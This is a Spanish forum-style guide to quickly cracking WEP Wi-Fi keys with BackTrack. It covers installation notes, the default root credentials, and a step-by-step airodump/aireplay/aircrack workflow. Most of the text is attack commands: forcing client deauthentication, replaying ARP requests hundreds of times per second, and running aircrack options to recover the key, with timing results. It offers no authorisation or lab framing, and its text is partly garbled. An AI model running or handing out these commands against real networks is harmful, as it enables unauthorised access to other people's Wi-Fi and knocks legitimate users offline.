Modo rápido de cracking WEP con Back|Track • las tarjetas -REBELDES- de Atheros (requiere instalación en HD), si te dan problemas en la reinyección desde el Live CD
Instalando• * Abre el instalador, del menú de
Kde.
• Fijar tus parámetros del disco duro (debe ser auto).
• Comienza la instalación y espera entre 15/20 minutos, (El tiempo real de espera que dependera de tu hardware.)
¡Una vez que terminado, reinicia el PC, y extrae el CD (que el LCD expulsara .)
•
Nota, esta versión
B|T Final, instala Lilo, si ya dispones de otro
Linux bajo
Grub, no te sobrescribirá el
MBR, pero deberás de editar una nueva línea a mano de tu Grub desde el otro SO
Linux, si solo dispones de
B|T no tendras problemas si instalas junto a
XP, y tienes problemas (como que solo arranque en entorno XP) postea y lo arreglamos…
Guía para gente
REALMENTE perezosa que no entiende las guías.

POST-DATA siempre queda
www.google.com
NOTA: Intenta no funcionar bajo las X´s siempre que te sea posible,
Estoy utilizando una tarjeta ath0. (Atheros), otras marcas de chiptset se denominan de distinto modo...
###############################
Login; root
passwd: toor
Slax; startx
conexion al sistema abrimos Konsole (Shell terminal)
airodump ath0 outfile 0 1
ALT F2Nueva
Konsole, conexion al sistema
AirodumpYa en modo monitor,
airodump ath0 dump channel [b]1[/b]
channel
0 para todos, hasta el 11 en España...
1 salva IV´s (solo el nº de canal, salva *.cap)
EJEMPLO;
airodump ath0 dump 3 1 (Captura iv´S del canal 3)
Deautentificación:aireplay -0 10 -a BSSID -c STATION ath0
Se trata de forzar al cliente a reautentificarse en la Red BSSID/MAC y Station/Mac ((server ARP solicita la ESSID))
* Antes de fijar del ataque del deautentificación necesitamos instalar aireplay para esperar a escuchar la petición del ARP
ARP inyección aireplay -3 -b BSSID -h STATION -x 500 ath0
* escuchar una petición del ARP que viene del MAC/STATION dirigido al MAC/BSSID del APs, entonces difunde esa petición unas 500 veces por segundo desde tu tarjeta de Atheros
aireplay ath0 -1 0 -e ESSID -a BSSID -h CLIENTMAC/0:1:2:3:4:5
aireplay ath0 -3 -e ESSID -b BSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985
Si estás próximo al
AP, y no esta protegido contra la inyección de paquetes, deberás revisar “desde”
ALT F1 (airodump) la reinyección de paquetes.
NOTA , Si el
AP no difunde su
ESSID, prueba a deautentificar clientes y forzar la conexión para tener una ocasión de encontrar el ESSID mediante este comando.
aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5
WEPUna vez que comiences a generar los paquetes necesarios puedes abrir aircrack (puede trabajar durante el ataque -3.)
Hay muchas opciones que puedes utilizar
Aircrack en el proceso de crackeo...
Sin embargo, puedes intentar este comando si realmente deseas (recordar que para esta prueba nombramos el archivo outfile.ivs) comprueba que no se renombro a outfile-01 si te falla…
Opcional• aircrack -a 1 -b APMAC outfile.ivs
Este comando le indica a aircrack que intenta crackear una llave de WEP, leyendo en el archivo de outfile.cap, usando solamente los paquetes que vienen de la dirección MAC del AP auditado. Es un comando básico de aircrack y puede tardar mucho incluso con una llave simple
Recomendable• aircrack -a 1 -i 1 -n 64 -m CLIENTMAC -b APMAC outfile.ivs
En un Pentium M portátil de 1.3 Ghz con Mb 512 el 1º comando después de 3 horas no funciono.

El 2º comando la encontro en 20 minutos

En un P4 sistema de 3.2 el 1º comando tomó varias horas para encontrar un trozo de la WEP -incompleto- ???, mientras que el 2º comando tardo menos de un segundo.
Próxima consulta, Back|Track y WAP...
Las quejas al administrador, los aplausos a la señora...
Besos para ellas, y patadinas en los ..... para ellos